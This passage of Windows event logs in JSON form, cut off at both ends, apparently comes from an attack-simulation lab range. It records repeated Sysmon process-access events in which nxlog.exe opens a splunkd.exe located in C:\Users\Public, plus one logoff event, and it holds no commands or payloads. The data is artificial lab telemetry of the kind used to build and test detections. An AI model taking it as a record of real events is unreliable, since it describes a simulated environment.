ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:45.518","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4673,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:46.518\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:46.518","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4674,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:47.518\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:47.518","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4675,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:48.519\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:48.519","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4676,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:49.519\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:49.519","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4677,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:50.519\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:50.519","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220446,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6636A\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6636a","LogonType":"3","EventReceivedTime":"2020-08-01 06:54:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4678,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:51.519\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:51.519","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files 